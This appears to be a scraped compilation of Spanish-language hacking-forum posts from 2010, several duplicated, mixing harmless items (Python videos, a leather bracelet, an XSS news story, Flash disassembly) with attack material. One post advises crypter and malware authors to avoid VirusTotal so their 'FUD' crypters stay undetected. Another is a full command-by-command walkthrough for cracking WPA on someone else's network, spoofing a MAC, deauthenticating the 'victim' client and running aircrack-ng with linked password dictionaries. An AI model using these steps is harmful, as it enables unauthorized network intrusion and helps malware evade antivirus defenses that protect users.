30 sept 2010

Imagnes de Sexy psd

http://i52.tinypic.com/29vax61.png
bueno espero que les guste esos diseños son mios y deso compartis con uds espero que les guste suerte a migos son de chicas sexys todo en formate psd para uds lo jalen o lo usen a su gusto con su photoshop nos vemos a tdos suerte by
http://freakshare.com/files/epixu0ib/Sexy-girls-shapes-by-KIMERAS.rar.html

Inspiración Hermés


Siempre me gusto el brazalete de Hermés...


Y ayer saque mi version, obviamente guardando las distancias, hice lo que pude con lo que tenia pero siempre cosiendo todo a mano.
Coser cuero a mano es terrible pero me encanta!, que les parece?



[python]VideoTraining Aprende A Programar En Python desde 0

Bueno gente les dejo el link de mi canal es un pequeño proyecto humilde de mi parte para enseñarles
a programar en python algo muy basico esto apenas va tomando fuerza no olviden suscribirse dejar
puntitos y comentarios acepto criticas constructivas y opiniones saludos a todos!
PD: ire agregando mas viedo y mas viedos con el tiempo preo en si trabajo bastante rapido XD! ojo este fue echo por juh asi que todos los creditos es del y lo videos juh bueno suerte amigos nos vemos

http://linuxplatanos.byethost12.com/wp-content/uploads/2009/08/python_logo.jpg
YouTube - Cha



Programando En Pyhton - 1 instalacion de pyhton y py2exe:

http://www.youtube.com/watch?v=WP-rESRc6bE

Programando en python - 2 Operadores simples

http://www.youtube.com/watch?v=l5AOTh497rI

Programando en python - 3 Variables

http://www.youtube.com/watch?v=BN7O3oADU0E

Programando en python - 4 Modulos y Funciones

http://www.youtube.com/watch?v=T54Yojn71Hw

Programando en python 5 - Escribiendo y Guardando Nuestro Primer Programa + Compilar Binario

http://www.youtube.com/watch?v=FbkJSxPk37g

Programando en python - 6 Comillas y Variables

http://www.youtube.com/watch?v=MW4OKI16d5c

Programando en python - 7 Convirtiendo a variable cualquier caracter

http://www.youtube.com/watch?v=aEJDiE1IzZY

Programando en pyhton - 8 Diferecia entre input y raw_input

http://www.youtube.com/watch?v=nf58oIZguhc

Programando en pyhton - 9 Secuencia y listas

http://www.youtube.com/watch?v=j_RoiOd2B7A

Programando en python - 10 Deslices en listas

http://www.youtube.com/watch?v=CfNU-wF_pTM

Evitemos el Uso de Virus Total, Usemos Novirusthanks!

hoy les enseñare y explicare por que NO debemos usar ciertos scaners online como VirusTotal (virustotal.com) este tuto les explicara como evitar que sus crypter o mods sean detectadas rápidamente por este gran error (Horror) como es el uso de esta pagina como tu scanner de mods o crypters.

Imagen


3 Validas Razones para Jamas Usarla:



1. Virus total envía Muestras a los antivirus esto quiere decir que todo lo que subas a Virus-total pasa por los laboratorios antivirus y estos son Firmados.

2. Al enviar tu server o crypter Fud a virus-total estas Destruyendo el trabajo de otros y el tuyo.
3. 1 semana despues de que lo hayas subido tu crypter a virus-total estara firmado y Detectado por mas de 30 antivirus

Asi que dile NO al uso de Virus-Total

Ahora Te preguntaras ¿entonces que otro scanner Online puedo usar?

El Unico scanner gratis y que no envia muestras a Los antivirus es NOVIRUSTHANKS.ORG

Imagen


Link: http://scanner2.novirusthanks.org/

*Antes de que empieces a usar Novirusthanks.org es necesario que aprendas a usarla Bien!

cuando estamos en el uploader cargamos nuestro Archivo pero antes de darle click a submit necesitamos marcar la opción:Do not distribute the sample ya que si no la marcamos es como que la subiera a virus total por eso siempre marcamos ese check para que no se distribuya nuestro Archivo y no envié las muestras a los Antivirus.

Imagen

Bueno con esto concluye el tutorial quiero aclarar que no hay mas scanners que tengan la opción de no distribuir la muestra y sean Gratuitos.

Evitemos el Uso de Virus Total, Usemos Novirusthanks!

hoy les enseñare y explicare por que NO debemos usar ciertos scaners online como VirusTotal (virustotal.com) este tuto les explicara como evitar que sus crypter o mods sean detectadas rápidamente por este gran error (Horror) como es el uso de esta pagina como tu scanner de mods o crypters.

Imagen


3 Validas Razones para Jamas Usarla:



1. Virus total envía Muestras a los antivirus esto quiere decir que todo lo que subas a Virus-total pasa por los laboratorios antivirus y estos son Firmados.

2. Al enviar tu server o crypter Fud a virus-total estas Destruyendo el trabajo de otros y el tuyo.
3. 1 semana despues de que lo hayas subido tu crypter a virus-total estara firmado y Detectado por mas de 30 antivirus

Asi que dile NO al uso de Virus-Total

Ahora Te preguntaras ¿entonces que otro scanner Online puedo usar?

El Unico scanner gratis y que no envia muestras a Los antivirus es NOVIRUSTHANKS.ORG

Imagen


Link: http://scanner2.novirusthanks.org/

*Antes de que empieces a usar Novirusthanks.org es necesario que aprendas a usarla Bien!

cuando estamos en el uploader cargamos nuestro Archivo pero antes de darle click a submit necesitamos marcar la opción:Do not distribute the sample ya que si no la marcamos es como que la subiera a virus total por eso siempre marcamos ese check para que no se distribuya nuestro Archivo y no envié las muestras a los Antivirus.

Imagen

Bueno con esto concluye el tutorial quiero aclarar que no hay mas scanners que tengan la opción de no distribuir la muestra y sean Gratuitos.

Desencritar Claves: WEP , WPA/WPA

Imagen
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática

> backtrack DESCARGA : http://www.backtrack-linux.org/downloads/

> Manual PDF DESCARGA: http://www.multiupload.com/9J46KWNVHE

Saludos Compañeros -^_^- .

Intypedia: Enciclopedia Visual de Seguridad Informática

El gran "little Budda" ha conseguido volver a enredar a un montón de gente para sacar adelante el proyecto Intypedia. La idea que se esconde tras este nombre, es la de conseguir evolucionar un poco más la Universidad y los sistemas de educación autodidactas, aprovechándose de los mecanismos que ofrece Internet, para ofrecer a los usuarios una enciclopedia de seguridad informática en formato multimedia.


El proyecto tratará de conseguir recoger, en videos de 10 a 15 minutos, explicaciones sobre Criptografía, Protocolos de comunicaciones, Malware, Seguridad de aplicacions, etc... Aún está empezando, y cuenta con material referente a criptografía, pero se espera que los miembros de la comunidad Criptored se animen a ir creando más material.

Una de las "gracias" es que las sesiones están presentadas por dos personajes llamados Alicia y Bernardo. He de decir que me gustan poco los dos tipos, pero supongo que estoy mayor. A mi me hubiera molado más ver al gran Jorge Ramió en versión avatar que pudiera ir tuneando. Así, con un mod de ropa le podría poner en traje, o elegir el modelo profe enrollado con bermudas, camiseta y gafas de sol... pero... eso no es lo importante del proyecto, sino la información.


Alicia y Bernardo (el del Mac)

En cada tema, además, se enlazan documentos de Criptored con información complementaria, para poner los documentos relacionados más accesibles.


Intypedia: Una lección de criptografía

Intypedia: Enciclopedia Visual de Seguridad Informática

El gran "little Budda" ha conseguido volver a enredar a un montón de gente para sacar adelante el proyecto Intypedia. La idea que se esconde tras este nombre, es la de conseguir evolucionar un poco más la Universidad y los sistemas de educación autodidactas, aprovechándose de los mecanismos que ofrece Internet, para ofrecer a los usuarios una enciclopedia de seguridad informática en formato multimedia.


El proyecto tratará de conseguir recoger, en videos de 10 a 15 minutos, explicaciones sobre Criptografía, Protocolos de comunicaciones, Malware, Seguridad de aplicacions, etc... Aún está empezando, y cuenta con material referente a criptografía, pero se espera que los miembros de la comunidad Criptored se animen a ir creando más material.

Una de las "gracias" es que las sesiones están presentadas por dos personajes llamados Alicia y Bernardo. He de decir que me gustan poco los dos tipos, pero supongo que estoy mayor. A mi me hubiera molado más ver al gran Jorge Ramió en versión avatar que pudiera ir tuneando. Así, con un mod de ropa le podría poner en traje, o elegir el modelo profe enrollado con bermudas, camiseta y gafas de sol... pero... eso no es lo importante del proyecto, sino la información.


Alicia y Bernardo (el del Mac)

En cada tema, además, se enlazan documentos de Criptored con información complementaria, para poner los documentos relacionados más accesibles.


Intypedia: Una lección de criptografía

El gran "little Budda" ha conseguido volver a enredar a un montón de gente para sacar adelante el proyecto Intypedia. La idea que se esconde tras este nombre, es la de conseguir evolucionar un poco más la Universidad y los sistemas de educación autodidactas, aprovechándose de los mecanismos que ofrece Internet, para ofrecer a los usuarios una enciclopedia de seguridad informática en formato multimedia.


El proyecto tratará de conseguir recoger, en videos de 10 a 15 minutos, explicaciones sobre Criptografía, Protocolos de comunicaciones, Malware, Seguridad de aplicacions, etc... Aún está empezando, y cuenta con material referente a criptografía, pero se espera que los miembros de la comunidad Criptored se animen a ir creando más material.

Una de las "gracias" es que las sesiones están presentadas por dos personajes llamados Alicia y Bernardo. He de decir que me gustan poco los dos tipos, pero supongo que estoy mayor. A mi me hubiera molado más ver al gran Jorge Ramió en versión avatar que pudiera ir tuneando. Así, con un mod de ropa le podría poner en traje, o elegir el modelo profe enrollado con bermudas, camiseta y gafas de sol... pero... eso no es lo importante del proyecto, sino la información.


Alicia y Bernardo (el del Mac)

En cada tema, además, se enlazan documentos de Criptored con información complementaria, para poner los documentos relacionados más accesibles.


Intypedia: Una lección de criptografía

Enhorabuena por el lanzamiento Jorge, y espero que se anime mucha gente a colaborar.

Nueva modalidad de ataques XSS en Twitter

La red social de ‘microblogging’ Twitter ha experimentado problemas en su servicio. Así, los usuarios veían mensajes con colores en sus líneas temporales y, al acercar el ratón a los mismos, volvían a enviar el mensaje malicioso.

Sin embargo, el servicio funcionaba con normalidad a través de dispositivos móviles, en los que los mensajes simplemente aparecen como un código, pero no son reenviados.

La compañía ha anunciado que ya ha identificado y solucionado el problema, un ataque XSS.

twitter1 Fallo de seguridad de Twitter afecta a millones de usuarios (Actualizado)

Según explica la empresa de seguridad informática Sophos, el problema se debió a la explotación de una vulnerabilidad que permite que se abran las páginas de terceros en el navegador sólo con mover el ratón por la página, es decir, sin necesidad de hacer clic.

Además, esta vulnerabilidad permitía crear mensajes ‘ocultos’ por bloques de color, conocidos como ‘tweets arco iris’.

Esta vulnerabilidad se aprovechaba al escribir un código de JavaScript (‘onmouseover’) dentro de una dirección URL. Al hacerlo, el usuario podía crear un mensaje ‘pop-up’ que aparecería cuando alguien pasaba el ratón por encima de dicho enlace.

Así, aunque al principio se utilizó esta vulnerabilidad como un "juego", según Sophos, pronto empezó a ser utilizado por spammers. De hecho, el problema ha llegado a afectar a Sarah Brown, mujer del antiguo primer ministro británico, que publicó sin quererlo un mensaje que dirigía a un sitio pornográfico japonés.

Fuente: El Mundo

Nueva modalidad de ataques XSS en Twitter

La red social de ‘microblogging’ Twitter ha experimentado problemas en su servicio. Así, los usuarios veían mensajes con colores en sus líneas temporales y, al acercar el ratón a los mismos, volvían a enviar el mensaje malicioso.

Sin embargo, el servicio funcionaba con normalidad a través de dispositivos móviles, en los que los mensajes simplemente aparecen como un código, pero no son reenviados.

La compañía ha anunciado que ya ha identificado y solucionado el problema, un ataque XSS.

twitter1 Fallo de seguridad de Twitter afecta a millones de usuarios (Actualizado)

Según explica la empresa de seguridad informática Sophos, el problema se debió a la explotación de una vulnerabilidad que permite que se abran las páginas de terceros en el navegador sólo con mover el ratón por la página, es decir, sin necesidad de hacer clic.

Además, esta vulnerabilidad permitía crear mensajes ‘ocultos’ por bloques de color, conocidos como ‘tweets arco iris’.

Esta vulnerabilidad se aprovechaba al escribir un código de JavaScript (‘onmouseover’) dentro de una dirección URL. Al hacerlo, el usuario podía crear un mensaje ‘pop-up’ que aparecería cuando alguien pasaba el ratón por encima de dicho enlace.

Así, aunque al principio se utilizó esta vulnerabilidad como un "juego", según Sophos, pronto empezó a ser utilizado por spammers. De hecho, el problema ha llegado a afectar a Sarah Brown, mujer del antiguo primer ministro británico, que publicó sin quererlo un mensaje que dirigía a un sitio pornográfico japonés.

Fuente: El Mundo

Ingeniería Inversa para archivos Flash .swf

Estuve buscando información cómo hacer ingeniería inversa a archivos flash, pero fue muy difícil encontrar algo, sólo encontré el programa con el que podemos hacer este trabajo inverso. Les voy a explicar cómo:

Primero, necesitamos el programa Flasm, tengo la versión compatible con Windows aqui.

Lo descargamos y podemos ponerlo en cualquier ubicación, yo prefiero ponerlo en C:\Flasm\ porque es más directo, es criterio de cualquiera.

Ahora vamos a usar un archivo flash, pueden coger cualquiera, yo voy a coger un flash de la página del comercio.pe:

image

Lo ubico en C:\Flasm\ y aqui viene lo bueno:

Iniciamos el modo de comandos CMD, nos vamos a C:\Flasm\ y ejecutamos flasm.exe:

image

Acá estamos diciéndole al programa que desamble el archivo Flash que quiero y como resultado dar el archivo FLM, el cual lo leeremos con un editor de notas (notepad, etc).

Ahora iremos a nuestro directorio y abriremos el archivo FLM que hemos desamblado con Notepad :

image

Vemos el código con el que se ha construído esta animación en Flash. Se imaginan si obtengo o tú obtienes un SWF infectado? Ahi es donde verás si el código contiene alguna redirección a una página maliciosa. Dependiendo de la estructura de la animación.

Espero que les haya gustado este mini-tutorial =).

Ingeniería Inversa para archivos Flash .swf

Estuve buscando información cómo hacer ingeniería inversa a archivos flash, pero fue muy difícil encontrar algo, sólo encontré el programa con el que podemos hacer este trabajo inverso. Les voy a explicar cómo:

Primero, necesitamos el programa Flasm, tengo la versión compatible con Windows aqui.

Lo descargamos y podemos ponerlo en cualquier ubicación, yo prefiero ponerlo en C:\Flasm\ porque es más directo, es criterio de cualquiera.

Ahora vamos a usar un archivo flash, pueden coger cualquiera, yo voy a coger un flash de la página del comercio.pe:

image

Lo ubico en C:\Flasm\ y aqui viene lo bueno:

Iniciamos el modo de comandos CMD, nos vamos a C:\Flasm\ y ejecutamos flasm.exe:

image

Acá estamos diciéndole al programa que desamble el archivo Flash que quiero y como resultado dar el archivo FLM, el cual lo leeremos con un editor de notas (notepad, etc).

Ahora iremos a nuestro directorio y abriremos el archivo FLM que hemos desamblado con Notepad :

image

Vemos el código con el que se ha construído esta animación en Flash. Se imaginan si obtengo o tú obtienes un SWF infectado? Ahi es donde verás si el código contiene alguna redirección a una página maliciosa. Dependiendo de la estructura de la animación.

Espero que les haya gustado este mini-tutorial =).

Quitar la publicidad de Avira

[avira.png]
Una de las cosas digamos "molestas" de este gran antivirus es que, cada vez que actualiza, muestra una ventana que te recuerda que puedes comprar la versión de pago.

Para solventar el problemilla, a continuación mostramos una serie de pasos sencillos según el sistema operativo que utilices:

Windows 2000 / Windows XP Pro

1. Inicio / Ejecutar.
2. Escribir gpedit.msc y click en OK.
3. Ir a "Configuracion de usuario > Plantillas administrativas > Sistema"
4. Hacer doble click en "No ejecutar aplicaciones de Windows especificadas".
5. Boton derecho > Propiedades > Habilitada y hacer click en Mostrar.
6. Añadir "avnotify.exe".
7. Clicar Ok en todas las ventanas abiertas.
8. Reiniciar

Windows XP Home


1. Reiniciar en modo seguro
2. Iniciar sesión con privilegios administrativos.
3. Ir a : Program Files ( Archivos de programa)\Avira\AntiVir PersonalEdition Classic.
4. Click derecho en avnotify.exe e ir a Propiedades > Seguridad > Avanzado.
5. Click en editar -> Traverse Folder / Execute File-> deny-> OK.
6. Repetir para todos los usuarios
7. Reiniciar en modo normal.

Windows 7 y Vista Business/Ultimate


1. Inicio > Panel de control
2. Herramientas administrativas > Política de seguridad local.
3. Click en Software Restriction Policy > Action > Create new restriction policy.
4. Click derecho, e ir a additional rules > new path rule.
5. Ir a C:\Program files(Archivos de programa)\Avira\AntiVir PersonalEdition Classic y double-click en avnotify.exe.
6. Dejar el nivel de seguridad como no permitido "disallowed"
7. Click en aplicar y OK.

Windows Vista Home Premium


1. Ir a C:\Program Files(archivos de programa)\Avira\AntiVir PersonalEdition Classic\avnotify.exe.
2. Click derecho en avnotify.exe e ir a Propiedades > Seguridad.
3. Bajo el grupo o nombre de usuario "SYSTEM", click editar.
4. Poner una marca bajo la columna DENY para "read and execute".

Fuente: http://www.wikihow.com/Remove-the-Popup-Ads-in-Avira-Antivir

Instalacion de modulos wifiway BY papones + [DICCIONARIOS]

Live usb y Live cd
Es tan facil como copiar y pegar
En este caso vamos a instalar SpoonWep2-SpoonWpa en nuestro cd o usb
Vamos a irnos en mi caso al pendrive donde tenemos instalado las 2 carpetas del wifiway
Entramos en la carpeta wifiway,seguidamente la carpeta modulos.
Dentro de ella copiamos los 3 archivos en extension LZM que vamos a necesitar
Estas 2 herramientas trabajan en java asi que necesitamos:

Java:jre-6u17.lzm

http://www.slax.org/modules/193/dl/jre-6u17.lzm

spoonwep.lzm
http://virjacode.com/projects/beefup/dloads/spoonwep.lzm
spoonwpa.lzm
http://virjacode.com/projects/beefup/dloads/spoonwpa.lzm

Asi de facil ahora solo tenemos que arancar del pendrive o cd modificado y encontraremos las aplicaciones perfectamente instaladas

Imagen

Os recomiendo para un correcto funcionamiento de las aplicaciones,actualizar wifiway desde wifipacket y en este orden:

(Necesitamos estar conectados a internet para actualizar)(Datos modificados ,para la ver 1 de wifiway)
Código:
wifiway ~ # wifipacket update
Lista actualizada correctamente
wifiway ~ # wifipacket list
svn-ssl 1.000
aircrack-ng-svn 1.000
airoscript 1.000
firefox-install 3.011
firefox-live 3.011
nvidia7000 1.000
spoonwep-live 1.000
teamspeak_rc2 1.000
wlandecrypter 1.100
aircrack-ng-wpa-sse2 1.000
airoscript_chinitiw 1.100
firefox+plugin-install 3.011
spoonwep-install 1.000

Wifiway ultima version 1

1ºInstalamos el aircrack-ng-wpa-sse2

wifiway ~ # wifipacket install aircrack-ng-wpa-sse2
Encontrado
Descargado
Chmod
Comprobado
aircrack-ng
Paquete instalado satisfactoriamente
Borrados temporales

2ºinstalamos airoscript_chinitiw


wifiway ~ # wifipacket install airoscript_chinitiw
Encontrado
Descargado
Chmod
Comprobado
airoscript.chi
Paquete instalado satisfactoriamente
Borrados temporales

Con esto nos sobra para poder utilizar al 100x100 sin problemas los nuevos modulos instalados,en este caso spoonwep2 y spoonwpa


Rapida y sencilla esplicacion de su utilizacion

Seleccionamos dispositivo,chip normal o atheros,y la 3º opcion pc remota desconocida

Imagen

Seguido elegimos escanear en este caso canal fijo,el mismo escanea y nos marca las aps que tienen cliente y que clientes son

Imagen

Una vez elegido el cliente elejimos handshake capture

Imagen

Por ultimo nos da 3 opciones para el diccionario,el suyo,la base de datos o el nuestro propio y se termino asi de sencillo el wpa y mas facil el wep2

Imagen

_________________________________________________________________________________

MEGADICCIONARIO DE 227 MILLONES DE PALABRAS (150.47 MB)
http://www.megaupload.com/?d=Y24D0C72

Ocupad 2 gb descomprimido


DICCIONARIO GENERAL DE 6,18 MEGAS.
http://www.megaupload.com/?d=SH49LXYW


DICCIONARIO: DICCIONARIO MULTILINGUE DE 93,2MB 8.5 millones de palabras.
http://www.megaupload.com/?d=85ZFE6M0


DICCIONARIO DE 10 MILLONES DE PALABRAS.
http://www.megaupload.com/?d=Y7H5CKHJ


http://www.insidepro.com/eng/download.shtml

http://distro.ibiblio.org/pub/linux/distributions/openwall/wordlists/

No eh tenido la dicha de haber probado algunos de los mensionados.
en cuanto pueda lo are. un saludo


Lilo te añado estos de teledos.Saludos:

Nombre de archivo: Tele2_wpa_dic_IX1V7_pmk.rar
Descripción del archivo: Diccionario claves preconfiguradas redes [Tele2] precomputado para cowpatty (fijado IX1V7)
Tamaño del archivo: 33.92 MB
Descargar enlace: http://www.megaupload.com/?d=R0VODZE0


Nombre de archivo: Tele2_wpa_dic_IX1V_pmk.rar
Descripción del archivo: Diccionario claves preconfiguradas redes [Tele2] precomputado para cowpatty
Tamaño del archivo: 339.08 MB
Descargar enlace: http://www.megaupload.com/?d=I7DIGKLT

wpa wifiway by Lilo

eh esto leeyendo y no ehvisto ningun tuto de hacking wpa y todos preguntanpor eso. eh respondido varios temas como bien venida les eh escho este post que tenia en mi foro. leean con antencion

Tratare de explicar el hackeo de una red, inalambrica Wifi. con seguridad (wpa)

Bueno lo primero que devemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.

Primera entendamos un poco.
El diccionario lo podemos descargar en el se encuentran palabras millones de palabras. multiilenguajes. etc.

Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningun diccionario con tu propia /o pass.

TAl diccionario no existe.

TAmbien devemos tener encuenta que deve de haber clientes conectados. al AP De echo no se podra. Empesemos.

Lo primero es. cambiar la direccion mac de nuestra tarjeta.
Antes devemos dar de baja en interfas Wlan0 cabiar por el sullo.

ifconfig wlan0 down dado de baja

macchanger -m 00:11:22:33:44:55 wlan0 nos aparecera el cambio de la mac.

Reaccion.

Imagen

Echo esto ya tenemos nuestra mac falsa.
lo siguiente sera poner dar de alta la tarjeta o el interfas.

ifconfig wlan0 up

Reaccion.

Imagen

Ahora a que ponerla en modo monitor podemos hacerlo con airmon-ng o con este simple comando.

iwconfig wlan0 mode monitor

Reaccion.

Imagen

Como vemos no nos ah marcado error ni nada prosigamos.

Escanearemos canales en busca de redes. wpa con cliente. Usaremos airodump-ng

airodump-ng wlan0

Reaccion.

Imagen

Una vez localizado el AP presionamos control c para detener la accion de la shell.
tomamos encuenta la mac del AP y la mac del cliente

Capturamos trafico del canal con airodump-ng

airodump-ng --bssidMac_ap -cCanal -w Nombre_del_fichero wlan0

airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0


Reaccion.

Imagen

Como vemos en la imagen de la Shell de lado superior derecho No emos conseguido, aun el handshake, necesitamos hacer un A0
Desauntentificar al cliente conectado al AP, desconectarlo y cuando el cliente reconecte. tendremos nuestro handshake.
EL HANDSHAKE es como un saludo un simple apreton de manos. tomenlo en cuenta como eso

Usamos aireplay-ng A0


aireplay-ng -0 20 -a MAC_AP -c MAC_CLIENTE wlan0

aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0


Reaccion.

Imagen

Mientras tanto lo que paso en la pc de la victima. Cliente

El cliente fue descoenctado y reconecto.

Imagen

Bueno ya que obtuvimos el handshake.

Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verrificar

aircrack-ng /root/swireless/archivo.cap

aircrack-ng /root/swireless/handshake.cap


Reaccion.

Imagen

Como vemos todo a salido bien


aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt

SE me olvidaba algo el diccionario deve de ir en la ruta /root/swireless/wordlist. y deve ser renombrado a diccionario.txt

aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt

Solo falta pasarle aircrack-ng con diccionario al handshake y listo

Imagen

Una vez echo eso reaccionaara asi encontrando la key :P :P

Reaccion.

Imagen

Espero les aya gustado. esta muy resumido. y muy explicado Gracias.

funciona con bakctrack para otros usuarios recomeindo que usen wifiway antes que backtrack

Saludos

wpa wifiway by Lilo

eh esto leeyendo y no ehvisto ningun tuto de hacking wpa y todos preguntanpor eso. eh respondido varios temas como bien venida les eh escho este post que tenia en mi foro. leean con antencion

Tratare de explicar el hackeo de una red, inalambrica Wifi. con seguridad (wpa)

Bueno lo primero que devemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.

Primera entendamos un poco.
El diccionario lo podemos descargar en el se encuentran palabras millones de palabras. multiilenguajes. etc.

Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningun diccionario con tu propia /o pass.

TAl diccionario no existe.

TAmbien devemos tener encuenta que deve de haber clientes conectados. al AP De echo no se podra. Empesemos.

Lo primero es. cambiar la direccion mac de nuestra tarjeta.
Antes devemos dar de baja en interfas Wlan0 cabiar por el sullo.

ifconfig wlan0 down dado de baja

macchanger -m 00:11:22:33:44:55 wlan0 nos aparecera el cambio de la mac.

Reaccion.

Imagen

Echo esto ya tenemos nuestra mac falsa.
lo siguiente sera poner dar de alta la tarjeta o el interfas.

ifconfig wlan0 up

Reaccion.

Imagen

Ahora a que ponerla en modo monitor podemos hacerlo con airmon-ng o con este simple comando.

iwconfig wlan0 mode monitor

Reaccion.

Imagen

Como vemos no nos ah marcado error ni nada prosigamos.

Escanearemos canales en busca de redes. wpa con cliente. Usaremos airodump-ng

airodump-ng wlan0

Reaccion.

Imagen

Una vez localizado el AP presionamos control c para detener la accion de la shell.
tomamos encuenta la mac del AP y la mac del cliente

Capturamos trafico del canal con airodump-ng

airodump-ng --bssidMac_ap -cCanal -w Nombre_del_fichero wlan0

airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0


Reaccion.

Imagen

Como vemos en la imagen de la Shell de lado superior derecho No emos conseguido, aun el handshake, necesitamos hacer un A0
Desauntentificar al cliente conectado al AP, desconectarlo y cuando el cliente reconecte. tendremos nuestro handshake.
EL HANDSHAKE es como un saludo un simple apreton de manos. tomenlo en cuenta como eso

Usamos aireplay-ng A0


aireplay-ng -0 20 -a MAC_AP -c MAC_CLIENTE wlan0

aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0


Reaccion.

Imagen

Mientras tanto lo que paso en la pc de la victima. Cliente

El cliente fue descoenctado y reconecto.

Imagen

Bueno ya que obtuvimos el handshake.

Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verrificar

aircrack-ng /root/swireless/archivo.cap

aircrack-ng /root/swireless/handshake.cap


Reaccion.

Imagen

Como vemos todo a salido bien


aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt

SE me olvidaba algo el diccionario deve de ir en la ruta /root/swireless/wordlist. y deve ser renombrado a diccionario.txt

aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt

Solo falta pasarle aircrack-ng con diccionario al handshake y listo

Imagen

Una vez echo eso reaccionaara asi encontrando la key :P :P

Reaccion.

Imagen

Espero les aya gustado. esta muy resumido. y muy explicado Gracias.

funciona con bakctrack para otros usuarios recomeindo que usen wifiway antes que backtrack

Saludos